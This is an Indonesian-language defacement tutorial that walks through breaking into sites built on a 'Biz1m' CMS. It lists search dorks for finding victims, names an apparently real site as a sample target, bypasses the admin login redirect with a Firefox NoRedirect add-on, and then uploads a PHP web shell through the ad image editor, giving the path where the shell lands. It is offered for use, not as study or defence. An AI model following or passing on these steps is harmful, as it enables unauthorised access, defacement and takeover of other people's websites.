Deface Metode Bypass Noredirect Cms Biz1m

# Title : Bypass Admin Noredirect Biz1m
# Author : Cyb#3r00T
# Dork : Intitle:"::Peluang buat bisnes"
Inurl:/?buka=admin
Inurl:/?buka=testimoni
Inurl:/?buka=berita

1. Dorking !!

2. Pilih salah satu target.

Contoh disini gua pake target http://promosiauto.com

3. Lalu masukan Exploit admin login /admin-cp/logadmin.php di belakang url target

Misal ane pilih http://promosiauto.com trus ane tambahin exploit 

Hasilnya akan menjadi http://promosiauto.com/admin-cp/logadmin.php

4. Sekarang masuk ke mozilla firefox. Akses web yang sudah diberi Exploit tadi dengan Mozilla Firefox :V

5. Kalo udah sekarang klik tombol alt. lalu lihat diatas (toolbar firefox) lalu pilih Tools > Noredirect

6. Di Noredirect kalian klik Add new. Nah nanti akan muncul kotak :V
Masukin target kalian tadi di kotak tersebut dengan menyertakan tanda "^" di depan target.
Contoh:" ^http://promosiauto.com/admin-cp/logadmin.php" (tanpa petik)

7. Sekarang klik Ok. Trus tinggal akses ke dashboard adminnya aja.
Silahkan akses Web tadi dengan menambahkan exploit baru. Yaitu admin-cp.php
Contoh: http://promosiauto.com/admin-cp.php

8. Tinggal upload Shell deh! Caranya kita exploit lagi dengan menambahkan
"admin-cp.php?buka=iklanvvip"
Contoh:http://promosiauto.com/admin-cp.php?buka=iklanvvip

9. Tinggal klik edit gambar, jedar jeder deh!
Akses Shell: www.target.com/images/shellkamu.php

Download All Bahan ( Mozilla Old Version, Noredirect Dll : https://blog.xploitsecid.or.id/2019/12/file-tamper-data-firefox-tutorial-tamper.html